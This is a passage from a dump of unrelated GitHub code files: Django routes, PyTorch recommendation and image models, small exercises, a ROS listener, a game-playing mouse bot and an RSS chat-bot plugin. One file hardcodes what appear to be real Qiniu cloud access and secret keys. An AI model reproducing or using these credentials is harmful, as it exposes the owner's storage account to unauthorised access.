import views\n\nurlpatterns = [\n path('GET', views.getData),\n path('POST', views.postData),\n\n # 로그인\n path('login', views.api_login_view),\n # 로그인 확인\n path('login_result', views.api_login_result),\n\n # 맵 등록\n path('map_create', views.api_map_create),\n\n # 맵 조회\n path('map_select', views.api_map_select),\n\n # 프로 파일 데이터 저장\n path('profile', views.api_profile_result),\n\n # 경고 프로파일 데이터\n path('warning_profile', views.api_warning_profile_result),\n]\n","repo_name":"eungyukm/DjangoAzure","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22668044562","text":"import math\n\nimport torch\nimport torch.nn as nn\n\nfrom helper import *\n\n\nclass AFM(nn.Module):\n def __init__(self, field_size, feat_sizes, embedding_size=4, task='binary'):\n super(AFM, self).__init__()\n self.task = task\n self.field_size = field_size\n self.feature_sizes = feat_sizes\n self.embedding_size = embedding_size\n self.A = field_size * (field_size - 1) // 2\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n stdv = math.sqrt(1 / len(self.feature_sizes))\n self.bias = nn.Parameter(torch.randn(1), requires_grad=True)\n self.fm_first = nn.Embedding(sum(feat_sizes), 1)\n self.fm_first.weight.data.normal_(0, std=stdv)\n self.fm_second = nn.Embedding(sum(feat_sizes), embedding_size)\n self.W = nn.Linear(self.embedding_size, self.A)\n self.b = nn.Parameter(torch.randn(self.A), requires_grad=True)\n self.h = nn.Linear(self.A, 1)\n self.p = nn.Linear(self.embedding_size, 1)\n\n def forward(self, x):\n '''\n\n :param x: batch_size*field_size\n :return:\n '''\n batch_size = x.shape[0]\n fm_first = self.fm_first(x).squeeze(2)\n fm_second = self.fm_second(x) # batch_size*field_size*embedding_size\n # v_list=[]\n rows, cols = [], []\n for i in range(self.field_size):\n for j in range(i + 1, self.field_size):\n rows.append(i)\n cols.append(j)\n # x2=fm_second[:,i,:]*fm_second[:,j,:]#batch_size*embedding_size\n # v_list.append(x2)\n v = fm_second[:, rows, :] * fm_second[:, cols, :]\n # v=torch.cat(v_list,dim=0).view(batch_size,self.A,-1)# batch_size*A*embedding_size\n weights = self.h(torch.relu(self.W(v) + self.b)).squeeze(2) # batch_size*A\n weights = weights.softmax(dim=1) # batch_size*A\n atm = torch.bmm(weights.unsqueeze(1), v).squeeze(1)\n atm = self.p(atm).view(batch_size)\n total_sum = torch.sum(fm_first, 1) + atm + self.bias\n if self.task == 'binary':\n total_sum = torch.sigmoid(total_sum)\n return total_sum\n\n\nif __name__ == '__main__':\n x = torch.randint(1, 4, (3000, 8))\n x, field_size, feature_sizes = find_deep_params(x)\n x = torch.Tensor(x).long()\n y = torch.randint(0, 1, (3000,)).float()\n # print(y[:40])\n atm = AFM(field_size=field_size, feat_sizes=feature_sizes)\n train(atm, x, y, num_epoch=200, lr=3e-2)\n print(atm(x)[:10])\n print(y[:10])\n","repo_name":"Xiaoctw/PYTORCH","sub_path":"ATM.py","file_name":"ATM.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26234812234","text":"def data_type(s):\n\ts_type = type(s)\n\tif s_type == str:\n\t\treturn len(s)\n\n\telif s_type ==bool:\n\t\treturn s\n\n\telif s_type ==int:\n\t\tif s == 100:\n\t\t\treturn 'equal to 100'\n\t\telif s < 100:\n\t\t\treturn 'less than 100'\n\n\t\telse:\n\t\t\treturn 'more than 100'\n\n\telif s_type == list:\n\t\ttry:\n\t\t\tif s[2]:\n\t\t\t\treturn 
s[2]\n\t\texcept Exception as e:\n\t\t\treturn None\n\telse:\n\t\treturn 'no value'","repo_name":"inchwara/HomeDay1","sub_path":"Data Types Lab.py","file_name":"Data Types Lab.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30819470701","text":"# given 3 sequences of numbers, A, B, C, determine if their intersection is empty. Namely, there does not exist an element x such that\n# x is in A, B, and C\n# Assume no individual sequence contains duplicates\n\nimport numpy as np\n\ndef return_smallest_to_largest(A,B,C):\n    list_of_lists = [A,B,C]\n    len_list = [len(A), len(B), len(C)]\n    fin_list = [0]*3\n    for i in range(len(len_list)):\n        idx = np.argmin(len_list)\n        fin_list[i] = list_of_lists[idx]\n        len_list = len_list[0:idx] + len_list[idx+1:]\n        list_of_lists = list_of_lists[0:idx] + list_of_lists[idx+1:]\n    return fin_list\n\ndef set_disjoint1(A,B,C):\n    smtlrg = return_smallest_to_largest(A,B,C)\n    for a in smtlrg[0]:\n        for b in smtlrg[1]:\n            if a == b:\n                # we only check an intersection with c if a, and b intersect\n                for c in smtlrg[2]:\n                    if a == c:\n                        return [False, a]\n    return [True, '']\n\n\ndef main():\n    A = input('Enter sequence A: ')\n    B = input('Enter sequence B: ')\n    C = input('Enter sequence C: ')\n    A = A.split(',')\n    B = B.split(',')\n    C = C.split(',')\n    resp = set_disjoint1(A, B, C)\n    print(resp)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"williamdarkocode/AlgortithmsAndDataStructures","sub_path":"threeway_set_disjoint.py","file_name":"threeway_set_disjoint.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33036536576","text":"import qiniu\n\n# 需要填写你的 Access Key 和 Secret Key\naccess_key = 'kJ8wVO7lmFGsdvtI5M7eQDEJ1eT3Vrygb4SmR00E'\nsecret_key = 'rGwHyAvnlLK7rU4htRpNYzpuz0OHJKzX2O1LWTNl'\n# 要上传的空间\nbucket_name = 'infonews'\n\n\ndef upload_img(data):\n    \"\"\"\n    上传文件\n    :param data: 上传的文件 bytes\n    :return: 上传后的文件名\n    \"\"\"\n    q = qiniu.Auth(access_key, secret_key)\n    key = None  # 上传的文件名 如果设置为None, 会生成随机名称\n    token = q.upload_token(bucket_name)\n    ret, info = qiniu.put_data(token, key, data)\n    if ret is not None:\n        return ret.get(\"key\")\n    else:\n        raise BaseException(info)\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/utils/image_storage.py","file_name":"image_storage.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70227366507","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\n\ndef callback(data):\n    rospy.loginfo(rospy.get_caller_id()+\"I heard %s\",data.data)\n    \ndef listener():\n\n    # in ROS, nodes are uniquely named. If two nodes with the same\n    # name are launched, the previous one is kicked off. 
The \n    # anonymous=True flag means that rospy will choose a unique\n    # name for our 'listener' node so that multiple listeners can\n    # run simultaneously.\n    rospy.init_node('hello_world_subscriber', anonymous=True)\n\n    rospy.Subscriber(\"hello_pub\", String, callback)\n\n    # spin() simply keeps python from exiting until this node is stopped\n    rospy.spin()\n    \nif __name__ == '__main__':\n    listener()\n","repo_name":"PacktPublishing/Learning-Robotics-using-Python-Second-Edition","sub_path":"chapter_1_code/hello_world/scripts/hello_world_subscriber.py","file_name":"hello_world_subscriber.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"37"} +{"seq_id":"34918092046","text":"#!/usr/bin/env python3\nfrom pyautogui import *\nimport pyautogui\nimport time\nimport keyboard\nimport win32api as winapi\nimport win32con as wincon\n\ndef click(x, y):\n    winapi.SetCursorPos((x,y))\n    winapi.mouse_event(wincon.MOUSEEVENTF_LEFTDOWN, 0, 0)\n    time.sleep(0.01)\n    winapi.mouse_event(wincon.MOUSEEVENTF_LEFTUP, 0, 0)\n\ndef pause():\n    pause_location = pyautogui.locateOnScreen('pause.png', grayscale=True, confidence=0.9)\n    if(pause_location is not None):\n        pause_location = pyautogui.center(pause_location)\n        click(pause_location[0], pause_location[1])\n    while(keyboard.is_pressed('p')) == False:\n        continue\n    \n    winapi.SetCursorPos((0,0))\n    time.sleep(1)\n\n    resume_location = pyautogui.locateOnScreen('resume.png', grayscale=True, confidence=0.9)\n    if(resume_location is not None):\n        resume_location = pyautogui.center(resume_location)\n        click(resume_location[0], resume_location[1])\n    else:\n        return False\n    \n    return True\n\n\n\ndef main():\n    bar_location = pyautogui.locateOnScreen('bar.png', grayscale=True, confidence=0.9)\n    if(bar_location is None):\n        bar_location = (0,0)\n\n    while(keyboard.is_pressed('q')) == False:\n        if(keyboard.is_pressed('p')):\n            if(pause() == False):\n                print(\"Unable to resume\")\n                exit() \n\n        ball_location = pyautogui.locateOnScreen('ball.png', grayscale=True, confidence=0.7)\n        if(ball_location is not None):\n            ball_location = pyautogui.center(ball_location)\n            if(bar_location == (0, 0)):\n                winapi.SetCursorPos(ball_location)\n            else:\n                winapi.SetCursorPos((ball_location[0], bar_location[1]))\n\n        time.sleep(0.01)\n\n\n\nif __name__ == \"__main__\":\n    print(\"Press q to start/end the program\")\n    while(keyboard.is_pressed('q')) == False:\n        continue\n\n    print(\"Program starting\\nPress \\'p\\' for pausing the bot or \\'q\\' to end it\")\n    time.sleep(2)\n    main()\n\nprint(\"Program ended\")","repo_name":"FadedGuy/BreakoutBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32654551037","text":"import arrow\nimport difflib\nimport re\nimport sqlite3\n\nfrom email.utils import parsedate_to_datetime\nfrom nonebot import logger\nfrom pyquery import PyQuery as Pq\nfrom tinydb import TinyDB\nfrom tinydb.middlewares import CachingMiddleware\nfrom tinydb.storages import JSONStorage\nfrom typing import List, Dict\n\nfrom .cache_manage import (\n    cache_db_manage,\n    cache_json_manage,\n    duplicate_exists,\n    insert_into_cache_db,\n)\nfrom .cache_manage import cache_filter\nfrom .check_update import check_update\nfrom .download_torrent import down_torrent\nfrom .handle_html_tag import handle_bbcode\nfrom .handle_html_tag import handle_html_tag\nfrom .handle_images import handle_img\nfrom 
.handle_translation import handle_translation\nfrom .send_message import send_msg\nfrom .utils import get_proxy\nfrom .utils import get_summary\nfrom .write_rss_data import write_item\nfrom ....RSS.rss_class import Rss\nfrom ....config import config\nfrom ....config import DATA_PATH\n\n\n# 订阅器启动的时候将解析器注册到rss实例类?,避免每次推送时再匹配\nclass ParsingItem:\n def __init__(\n self, func: callable, rex: str = \"(.*)\", priority: int = 10, block: bool = False\n ):\n \"\"\"\n - **类型**: ``object``\n - **说明**: 解析函数\n \"\"\"\n self.func: callable = func\n\n \"\"\"\n - **类型**: ``str``\n - **说明**: 匹配的订阅地址正则,\"(.*)\" 是全都匹配\n \"\"\"\n self.rex: str = rex\n\n \"\"\"\n - **类型**: ``int``\n - **说明**: 优先级,数字越小优先级越高。优先级相同时,会抛弃默认处理方式,即抛弃 rex=\"(.*)\" \n \"\"\"\n self.priority: int = priority\n\n \"\"\"\n - **类型**: ``bool``\n - **说明**: 是否阻止执行之后的处理,默认不阻止。抛弃默认处理方式,只需要 block==True and priority<10\n \"\"\"\n self.block: bool = block\n\n\n# 解析器排序\ndef _sort(_list):\n _list.sort(key=lambda x: x.priority)\n return _list\n\n\n# rss 解析类 ,需要将特殊处理的订阅注册到该类\nclass ParsingBase:\n \"\"\"\n - **类型**: ``List[ParsingItem]``\n - **说明**: 最先执行的解析器,定义了检查更新等前置步骤\n \"\"\"\n\n before_handler: List[ParsingItem] = []\n\n \"\"\"\n - **类型**: ``Dict[str, List[ParsingItem]]``\n - **说明**: 解析器\n \"\"\"\n handler: Dict[str, List[ParsingItem]] = {\n \"before\": [], # item的预处理\n \"title\": [],\n \"summary\": [],\n \"picture\": [],\n \"source\": [],\n \"date\": [],\n \"torrent\": [],\n \"after\": [], # item的最后处理,此处调用消息截取、发送\n }\n\n \"\"\"\n - **类型**: ``List[ParsingItem]``\n - **说明**: 最后执行的解析器,在消息发送后,也可以多条消息合并发送\n \"\"\"\n after_handler: List[ParsingItem] = []\n\n # 增加解析器\n @classmethod\n def append_handler(\n cls,\n parsing_type: str,\n rex: str = \"(.*)\",\n priority: int = 10,\n block: bool = False,\n ):\n def _decorator(func):\n cls.handler.get(parsing_type).append(\n ParsingItem(func, rex, priority, block)\n )\n cls.handler.update({parsing_type: _sort(cls.handler.get(parsing_type))})\n return func\n\n return _decorator\n\n @classmethod\n def append_before_handler(\n cls, rex: str = \"(.*)\", priority: int = 10, block: bool = False\n ):\n def _decorator(func):\n cls.before_handler.append(ParsingItem(func, rex, priority, block))\n cls.before_handler = _sort(cls.before_handler)\n return func\n\n return _decorator\n\n @classmethod\n def append_after_handler(\n cls, rex: str = \"(.*)\", priority: int = 10, block: bool = False\n ):\n def _decorator(func):\n cls.after_handler.append(ParsingItem(func, rex, priority, block))\n cls.after_handler = _sort(cls.after_handler)\n return func\n\n return _decorator\n\n\n# 对处理器进行过滤\ndef _handler_filter(_handler_list: list, _url: str) -> list:\n _result = [h for h in _handler_list if re.search(h.rex, _url)]\n # 删除优先级相同时默认的处理器\n _delete = [\n (h.func.__name__, \"(.*)\", h.priority) for h in _result if h.rex != \"(.*)\"\n ]\n _result = [\n h for h in _result if not ((h.func.__name__, h.rex, h.priority) in _delete)\n ]\n return _result\n\n\n# 解析实例\nclass ParsingRss:\n\n # 初始化解析实例\n def __init__(self, rss: Rss):\n self.state = {} # 用于存储实例处理中上下文数据\n self.rss = rss\n\n # 对处理器进行过滤\n self.before_handler = _handler_filter(\n ParsingBase.before_handler, self.rss.get_url()\n )\n self.handler = {}\n for k, v in ParsingBase.handler.items():\n self.handler[k] = _handler_filter(v, self.rss.get_url())\n self.after_handler = _handler_filter(\n ParsingBase.after_handler, self.rss.get_url()\n )\n\n # 开始解析\n async def start(self, rss_name: str, new_rss: dict):\n # new_data 是完整的 rss 解析后的 dict\n # 前置处理\n rss_title = 
new_rss.get(\"feed\").get(\"title\")\n new_data = new_rss.get(\"entries\")\n _file = DATA_PATH / (rss_name + \".json\")\n db = TinyDB(\n _file,\n storage=CachingMiddleware(JSONStorage),\n encoding=\"utf-8\",\n sort_keys=True,\n indent=4,\n ensure_ascii=False,\n )\n self.state.update(\n {\n \"rss_title\": rss_title,\n \"new_data\": new_data,\n \"change_data\": [], # 更新的消息列表\n \"conn\": None, # 数据库连接\n \"tinydb\": db, # 缓存 json\n }\n )\n for handler in self.before_handler:\n self.state.update(await handler.func(rss=self.rss, state=self.state))\n if handler.block:\n break\n\n # 分条处理\n self.state.update(\n {\n \"messages\": [],\n \"item_count\": 0,\n }\n )\n for item in self.state.get(\"change_data\"):\n item_msg = f\"【{self.state.get('rss_title')}】更新了!\\n----------------------\\n\"\n\n for handler_list in self.handler.values():\n # 用于保存上一次处理结果\n tmp = \"\"\n tmp_state = {\"continue\": True} # 是否继续执行后续处理\n\n # 某一个内容的处理如正文,传入原文与上一次处理结果,此次处理完后覆盖\n for handler in handler_list:\n tmp = await handler.func(\n rss=self.rss,\n state=self.state,\n item=item,\n item_msg=item_msg,\n tmp=tmp,\n tmp_state=tmp_state,\n )\n if handler.block or not tmp_state[\"continue\"]:\n break\n item_msg += tmp\n self.state.get(\"messages\").append(item_msg)\n\n # 最后处理\n for handler in self.after_handler:\n self.state.update(await handler.func(rss=self.rss, state=self.state))\n if handler.block:\n break\n\n\n# 检查更新\n@ParsingBase.append_before_handler(priority=10)\nasync def handle_check_update(rss: Rss, state: dict):\n db = state.get(\"tinydb\")\n change_data = await check_update(db, state.get(\"new_data\"))\n return {\"change_data\": change_data}\n\n\n# 判断是否满足推送条件\n@ParsingBase.append_before_handler(priority=11)\nasync def handle_check_update(rss: Rss, state: dict):\n change_data = state.get(\"change_data\")\n db = state.get(\"tinydb\")\n for item in change_data.copy():\n summary = get_summary(item)\n # 检查是否包含屏蔽词\n if config.black_word and re.findall(\"|\".join(config.black_word), summary):\n logger.info(\"内含屏蔽词,已经取消推送该消息\")\n write_item(db, item)\n change_data.remove(item)\n continue\n # 检查是否匹配关键词 使用 down_torrent_keyword 字段,命名是历史遗留导致,实际应该是白名单关键字\n if rss.down_torrent_keyword and not re.search(\n rss.down_torrent_keyword, summary\n ):\n write_item(db, item)\n change_data.remove(item)\n continue\n # 检查是否匹配黑名单关键词 使用 black_keyword 字段\n if rss.black_keyword and (\n re.search(rss.black_keyword, item[\"title\"])\n or re.search(rss.black_keyword, summary)\n ):\n write_item(db, item)\n change_data.remove(item)\n continue\n # 检查是否只推送有图片的消息\n if (rss.only_pic or rss.only_has_pic) and not re.search(\n r\"|\\[img]\", summary\n ):\n logger.info(f\"{rss.name} 已开启仅图片/仅含有图片,该消息没有图片,将跳过\")\n write_item(db, item)\n change_data.remove(item)\n\n return {\"change_data\": change_data}\n\n\n# 如果启用了去重模式,对推送列表进行过滤\n@ParsingBase.append_before_handler(priority=12)\nasync def handle_check_update(rss: Rss, state: dict):\n change_data = state.get(\"change_data\")\n conn = state.get(\"conn\")\n db = state.get(\"tinydb\")\n\n # 检查是否启用去重 使用 duplicate_filter_mode 字段\n if not rss.duplicate_filter_mode:\n return {\"change_data\": change_data}\n\n if not conn:\n conn = sqlite3.connect(DATA_PATH / \"cache.db\")\n conn.set_trace_callback(logger.debug)\n\n await cache_db_manage(conn)\n\n delete = []\n for index, item in enumerate(change_data):\n is_duplicate, image_hash = await duplicate_exists(\n rss=rss,\n conn=conn,\n item=item,\n summary=get_summary(item),\n )\n if is_duplicate:\n write_item(db, item)\n delete.append(index)\n else:\n 
change_data[index][\"image_hash\"] = str(image_hash)\n\n change_data = [\n item for index, item in enumerate(change_data) if index not in delete\n ]\n\n return {\n \"change_data\": change_data,\n \"conn\": conn,\n }\n\n\n# 处理标题\n@ParsingBase.append_handler(parsing_type=\"title\")\nasync def handle_title(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n # 判断是否开启了只推送图片\n if rss.only_pic:\n return \"\"\n\n title = item[\"title\"]\n\n if not config.blockquote:\n title = re.sub(r\" - 转发 .*\", \"\", title)\n\n res = f\"标题:{title}\\n\"\n if rss.translation:\n res += await handle_translation(content=title)\n\n # 如果开启了只推送标题,跳过下面判断标题与正文相似度的处理\n if rss.only_title:\n return res\n\n # 判断标题与正文相似度,避免标题正文一样,或者是标题为正文前N字等情况\n try:\n summary_html = Pq(get_summary(item))\n if not config.blockquote:\n summary_html.remove(\"blockquote\")\n similarity = difflib.SequenceMatcher(\n None, summary_html.text()[: len(title)], title\n )\n # 标题正文相似度\n if similarity.ratio() > 0.6:\n res = \"\"\n except Exception as e:\n logger.warning(f\"{rss.name} 没有正文内容!{e}\")\n\n return res\n\n\n# 处理正文 判断是否是仅推送标题 、是否仅推送图片\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=1)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n if rss.only_title or rss.only_pic:\n tmp_state[\"continue\"] = False\n return \"\"\n\n\n# 处理正文 处理网页 tag\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=10)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n try:\n tmp += await handle_html_tag(html=Pq(get_summary(item)))\n except Exception as e:\n logger.warning(f\"{rss.name} 没有正文内容!{e}\")\n return tmp\n\n\n# 处理正文 移出指定内容\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=11)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n # 移除指定内容\n if rss.content_to_remove:\n for pattern in rss.content_to_remove:\n tmp = re.sub(pattern, \"\", tmp)\n return tmp\n\n\n# 处理正文 翻译\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=12)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n if rss.translation:\n tmp += await handle_translation(tmp)\n return tmp\n\n\n# 处理图片\n@ParsingBase.append_handler(parsing_type=\"picture\")\nasync def handle_picture(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n\n # 判断是否开启了只推送标题\n if rss.only_title:\n return \"\"\n\n res = \"\"\n try:\n res += await handle_img(\n item=item,\n img_proxy=rss.img_proxy,\n img_num=rss.max_image_number,\n )\n except Exception as e:\n logger.warning(f\"{rss.name} 没有正文内容!{e}\")\n\n # 判断是否开启了只推送图片\n if rss.only_pic:\n return f\"{res}\\n\"\n\n return f\"{tmp + res}\\n\"\n\n\n# 处理来源\n@ParsingBase.append_handler(parsing_type=\"source\")\nasync def handle_source(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n return f\"链接:{item['link']}\\n\"\n\n\n# 处理种子\n@ParsingBase.append_handler(parsing_type=\"torrent\")\nasync def handle_torrent(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n res = \"\"\n if not rss.is_open_upload_group:\n rss.group_id = []\n if rss.down_torrent:\n # 处理种子\n try:\n hash_list = await down_torrent(\n rss=rss, item=item, proxy=get_proxy(rss.img_proxy)\n )\n if hash_list and hash_list[0] is not None:\n res += \"\\n磁力:\\n\"\n 
for h in hash_list:\n res += f\"magnet:?xt=urn:btih:{h}\\n\"\n res = res[:-1]\n except Exception as e:\n logger.error(f\"下载种子时出错:{e}\")\n return res\n\n\n# 处理日期\n@ParsingBase.append_handler(parsing_type=\"date\")\nasync def handle_date(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n date = item.get(\"published\", item.get(\"updated\"))\n if date:\n try:\n date = parsedate_to_datetime(date)\n except TypeError:\n pass\n finally:\n date = arrow.get(date).to(\"Asia/Shanghai\")\n else:\n date = arrow.now()\n return f\"日期:{date.format('YYYY年MM月DD日 HH:mm:ss')}\"\n\n\n# 发送消息\n@ParsingBase.append_handler(parsing_type=\"after\")\nasync def handle_message(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n db = state.get(\"tinydb\")\n\n # 发送消息并写入文件\n if await send_msg(rss=rss, msg=item_msg, item=item):\n\n if rss.duplicate_filter_mode:\n await insert_into_cache_db(\n conn=state.get(\"conn\"), item=item, image_hash=item.get(\"image_hash\")\n )\n\n if item.get(\"to_send\"):\n item.pop(\"to_send\")\n\n state[\"item_count\"] += 1\n else:\n item[\"to_send\"] = True\n if not item.get(\"count\"):\n item[\"count\"] = 1\n else:\n item[\"count\"] += 1\n\n write_item(db, item)\n\n return \"\"\n\n\n@ParsingBase.append_after_handler()\nasync def after_handler(rss: Rss, state: dict) -> dict:\n item_count = state.get(\"item_count\")\n conn = state.get(\"conn\")\n db = state.get(\"tinydb\")\n\n if item_count > 0:\n logger.info(f\"{rss.name} 新消息推送完毕,共计:{item_count}\")\n else:\n logger.info(f\"{rss.name} 没有新信息\")\n\n if conn is not None:\n conn.close()\n\n new_data_length = len(state.get(\"new_data\"))\n await cache_json_manage(db, new_data_length)\n db.close()\n\n return {}\n","repo_name":"mobyw/nonebot-general-rss","sub_path":"src/plugins/nonebot-general-rss/RSS/routes/Parsing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16532,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"30449488163","text":"# !/usr/bin/env python3\n# coding: utf-8\n\n# 3. 
Write a program that takes a path to a text file and a letter\n# and prints the list of words that start with the given letter.\n\n\ndef read_text(link_text):\n    text = open(link_text)\n    text_line = text.readlines()\n    for i in range(len(text_line)):\n        line_list = text_line[i].split(\" \")\n        for j in range(len(line_list)):\n            yield line_list[j]\n\n\ndef gen_find_words(gen, char):\n    words_list = []\n    while True:\n        try:\n            i = next(gen)\n            if i.startswith(char.lower()) or i.startswith(char.upper()):\n                words_list.append(i)\n            else:\n                continue\n        except StopIteration:\n            break\n    return words_list\n\n\nR = read_text(\"Text_Example.txt\")\nprint(gen_find_words(R, 'ф'))\n","repo_name":"PlusSP/Python","sub_path":"generators/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18462864240","text":"#!/usr/bin/env python3\n\ndef main():\n    n, m = map(int, input().split())\n    ab = [list(map(int,input().split())) for _ in range(m)]\n\n    list1 = []\n    list2 = []\n\n    for i in range(m):\n        if ab[i][0] == 1:\n            list1.append(ab[i][1])\n        if ab[i][1] == n:\n            list2.append(ab[i][0])\n\n    lists_and = set(list1) & set(list2)\n\n    if len(lists_and) > 0:\n        print('POSSIBLE')\n    else:\n        print('IMPOSSIBLE')\nmain()","repo_name":"KeiNishikawa218/atcoder","sub_path":"arc079/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24511504245","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom efficientnet_pytorch import EfficientNet\nfrom model import AuxClassifier\n\nclass RobustDenseNet(nn.Module):\n    \"\"\" DenseNet with aux output \"\"\"\n    def __init__(self, pretrained, num_classes):\n        super(RobustDenseNet, self).__init__()\n        self.base_network = torchvision.models.densenet121(\n            pretrained=pretrained)\n        self.base_network.classifier = nn.Linear(\n            in_features=1024, out_features=num_classes, bias=True)\n        self.aux_classifier = AuxClassifier(512, num_classes)\n\n    def setup_hook(self):\n        self.mid_output = []\n        def hook(module, input, output):\n            self.mid_output.append(output)\n        hook_obj = self.base_network.features.denseblock2.register_forward_hook(hook)\n        return hook_obj\n\n    def forward(self, x):\n        hook_obj = self.setup_hook()\n        pred = self.base_network.forward(x)\n        if self.training:\n            mid_out = self.mid_output\n            aux_pred = self.aux_classifier(mid_out[0])\n            hook_obj.remove()\n            return pred, aux_pred\n        else:\n            return pred\n\n\nclass RobustEfficientNet(RobustDenseNet):\n    def __init__(self, pretrained, num_classes):\n        super(RobustEfficientNet, self).__init__(pretrained, num_classes)\n        self.base_network = EfficientNet.from_pretrained('efficientnet-b4')\n        self.base_network._fc = nn.Linear(\n            in_features=1792, out_features=num_classes, bias=True)\n        self.aux_classifier = AuxClassifier(112, num_classes)\n\n    def setup_hook(self):\n        self.mid_output = []\n        def hook(module, input, output):\n            self.mid_output.append(output)\n        hook_obj = self.base_network._blocks[16].register_forward_hook(hook)\n        return hook_obj\n\n\nclass BasicNet2(nn.Module):\n    def __init__(self):\n        super(BasicNet2, self).__init__()\n        initNum = 128\n        self.init_layer = nn.Conv2d(3, initNum, kernel_size=3, stride=1,\n                                    padding=1)\n        self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n        self.conv1_a = nn.Conv2d(initNum, initNum*2, kernel_size=3, stride=1,\n                                 padding=1)\n        self.conv1_b = 
nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv1_c = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.bn1 = nn.BatchNorm2d(initNum*2, initNum*2)\n\n # self.conv_dn1 = nn.Conv2d(initNum*2, initNum*2, kernel_size=2,\n # stride=2, padding=0)\n\n initNum = initNum*2\n self.conv2_a = nn.Conv2d(initNum, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv2_b = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv2_c = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.bn2 = nn.BatchNorm2d(initNum*2, initNum*2)\n\n # self.conv_dn2 = nn.Conv2d(initNum*2, initNum*2, kernel_size=2,\n # stride=2, padding=0)\n\n initNum = initNum*2\n self.conv3_a = nn.Conv2d(initNum, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv3_b = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv3_c = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.bn3 = nn.BatchNorm2d(initNum*2, initNum*2)\n initNum = initNum*2\n\n # self.conv_dn3 = nn.Conv2d(initNum, initNum, kernel_size=2, stride=2,\n # padding=0)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.final = nn.Linear(initNum, 2)\n\n def forward(self, x):\n x = F.relu(self.init_layer(x))\n\n x = F.relu(self.bn1(self.conv1_a(x)))\n x = F.relu(self.bn1(self.conv1_b(x)))\n x1 = F.relu(self.bn1(self.conv1_c(x)))\n x = x1 + x\n x = self.maxpool(x)\n\n x = F.relu(self.bn2(self.conv2_a(x)))\n x = F.relu(self.bn2(self.conv2_b(x)))\n x1 = F.relu(self.bn2(self.conv2_c(x)))\n x = x1 + x\n x = self.maxpool(x)\n\n x = F.relu(self.bn3(self.conv3_a(x)))\n x = F.relu(self.bn3(self.conv3_b(x)))\n x1 = F.relu(self.bn3(self.conv3_c(x)))\n x = x1 + x\n x = self.maxpool(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.final(x)\n return x\n\n\nclass BasicNet(nn.Module):\n def __init__(self):\n super(BasicNet, self).__init__()\n self.init_layer = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1)\n\n self.block1 = BasicConvBlock(64)\n self.conv_pool1 = nn.Conv2d(128, 128, kernel_size=2, stride=2,\n padding=0)\n # self.attn1 = SelfAttentionModule(32)\n\n self.block2 = BasicConvBlock(128)\n self.conv_pool2 = nn.Conv2d(256, 256, kernel_size=2, 